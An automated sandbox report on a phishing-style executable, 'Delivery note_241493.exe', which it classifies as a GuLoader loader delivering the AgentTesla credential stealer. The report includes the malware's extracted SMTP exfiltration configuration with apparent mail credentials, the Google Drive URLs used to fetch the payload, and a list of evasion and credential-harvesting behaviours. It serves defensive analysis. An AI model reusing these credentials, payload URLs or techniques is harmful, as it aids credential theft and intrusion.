Loading ...

Play interactive tourEdit tour

Windows Analysis Report Delivery note_241493.exe

Overview

General Information

Sample Name:Delivery note_241493.exe
Analysis ID:1646
MD5:261b89797cb2864afeb6f968106b42c9
SHA1:3a213afbd149f81b7727efa53f02a69bab52efed
SHA256:7c8515b78f74b188965d84c98cfed02aee2d242c5365bc04a7690705c8b5c743
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Delivery note_241493.exe (PID: 7564 cmdline: 'C:\Users\user\Desktop\Delivery note_241493.exe' MD5: 261B89797CB2864AFEB6F968106B42C9)
    • RegAsm.exe (PID: 4276 cmdline: 'C:\Users\user\Desktop\Delivery note_241493.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • UserOOBEBroker.exe (PID: 7972 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "tamasfulop@csavarcsapagyexpress.huRozsnyoi42mail.csavarcsapagyexpress.huonyecarl@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.4961833687.0000000002380000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 4276JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 4276JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.111.89.226, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 4276, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49776

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: Delivery note_241493.exe.7564.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "tamasfulop@csavarcsapagyexpress.huRozsnyoi42mail.csavarcsapagyexpress.huonyecarl@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Delivery note_241493.exeVirustotal: Detection: 25%Perma Link
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AE6B68 CryptUnprotectData,3_2_00AE6B68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AE7160 CryptUnprotectData,3_2_00AE7160
            Source: Delivery note_241493.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49774 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: WEBSUPPORT-SRO-SK-ASSK WEBSUPPORT-SRO-SK-ASSK
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0l7hc8l5m01jjthf5v4et0b93qf3oibd/1634136825000/12448148553778765603/*/1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-9g-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49776 -> 185.111.89.226:587
            Source: global trafficTCP traffic: 192.168.11.20:49776 -> 185.111.89.226:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000003.00000002.9685253313.000000001D6D2000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpString found in binary or memory: http://RoaOsk.com
            Source: RegAsm.exe, 00000003.00000002.9685744051.000000001D731000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9686201568.000000001D773000.00000004.00000001.sdmpString found in binary or memory: http://Z7Bm0DNVgOa.net
            Source: RegAsm.exe, 00000003.00000002.9685947858.000000001D747000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000003.00000002.9685947858.000000001D747000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: RegAsm.exe, 00000003.00000002.9685947858.000000001D747000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000003.00000002.9685947858.000000001D747000.00000004.00000001.sdmpString found in binary or memory: http://csavarcsapagyexpress.hu
            Source: RegAsm.exe, 00000003.00000002.9685947858.000000001D747000.00000004.00000001.sdmpString found in binary or memory: http://mail.csavarcsapagyexpress.hu
            Source: RegAsm.exe, 00000003.00000002.9685947858.000000001D747000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: UserOOBEBroker.exe, 0000000D.00000002.9671840658.000001CEC0D20000.00000002.00020000.sdmpString found in binary or memory: http://schemas.microso
            Source: RegAsm.exe, 00000003.00000003.4933851596.0000000000968000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-9g-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-9g-docs.googleusercontent.com/Fy
            Source: RegAsm.exe, 00000003.00000003.4933970506.000000000091F000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000003.4934338593.0000000000969000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9673580519.000000000090F000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0l7hc8l5
            Source: RegAsm.exe, 00000003.00000002.9673055792.00000000008A8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JlaiCuMNy0PV111dLbQN
            Source: RegAsm.exe, 00000003.00000003.4934012659.0000000000925000.00000004.00000001.sdmp, RegAsm.exe, 00000003.00000002.9672547573.00000000007D0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc
            Source: RegAsm.exe, 00000003.00000002.9673055792.00000000008A8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkcLs
            Source: RegAsm.exe, 00000003.00000002.9673055792.00000000008A8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkcnr
            Source: RegAsm.exe, 00000003.00000002.9685947858.000000001D747000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: RegAsm.exe, 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0l7hc8l5m01jjthf5v4et0b93qf3oibd/1634136825000/12448148553778765603/*/1JlaiCuMNy0PV111dLbQNpRN9dpE5oBkc?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-9g-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49774 version: TLS 1.2
            Source: Delivery note_241493.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_004016761_2_00401676
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_004016291_2_00401629
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_0040143A1_2_0040143A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_001011303_2_00101130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00103A503_2_00103A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0010BA703_2_0010BA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_001043203_2_00104320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0010C7D03_2_0010C7D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_001037083_2_00103708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00116B083_2_00116B08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_001107F83_2_001107F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_008689D83_2_008689D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00864EB03_2_00864EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00866E003_2_00866E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0086C7653_2_0086C765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0086C3603_2_0086C360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_008644F83_2_008644F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00861FC03_2_00861FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AE3CA83_2_00AE3CA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AE28C83_2_00AE28C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AE91683_2_00AE9168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AEBE903_2_00AEBE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AED2C83_2_00AED2C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AEAE283_2_00AEAE28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AE8BF03_2_00AE8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AEEB2E3_2_00AEEB2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AEBCA03_2_00AEBCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AE3C083_2_00AE3C08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AE81A03_2_00AE81A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AFA1403_2_00AFA140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AF12C83_2_00AF12C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AF47403_2_00AF4740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00AF3EF03_2_00AF3EF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_1D425E083_2_1D425E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_1D424ACC3_2_1D424ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_1D425DC33_2_1D425DC3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_1D426AF13_2_1D426AF1
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_023863AA NtWriteVirtualMemory,1_2_023863AA
            Source: Delivery note_241493.exe, 00000001.00000000.4620167161.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFAIRIES.exe vs Delivery note_241493.exe
            Source: Delivery note_241493.exeBinary or memory string: OriginalFilenameFAIRIES.exe vs Delivery note_241493.exe
            Source: C:\Users\user\Desktop\Delivery note_241493.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeSection loaded: edgegdi.dllJump to behavior
            Source: Delivery note_241493.exeVirustotal: Detection: 25%
            Source: Delivery note_241493.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Delivery note_241493.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Delivery note_241493.exe 'C:\Users\user\Desktop\Delivery note_241493.exe'
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Delivery note_241493.exeFile created: C:\Users\user\AppData\Local\Temp\~DFB6DD8AA908338265.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@5/1@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.4961833687.0000000002380000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_004038DA push edx; iretd 1_2_004038E4
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_00406180 pushad ; iretd 1_2_00406183
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_0238227B push eax; iretd 1_2_02382293
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_02383352 push ds; ret 1_2_02383353
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_02386BDF push ebp; retf 1_2_02386BEB
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_023841FD push 99F0CEBDh; iretd 1_2_02384202
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_02380CB6 push eax; retf 1_2_02380D2B
            Source: C:\Users\user\Desktop\Delivery note_241493.exeCode function: 1_2_02380D34 push eax; retf 1_2_02380D2B
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
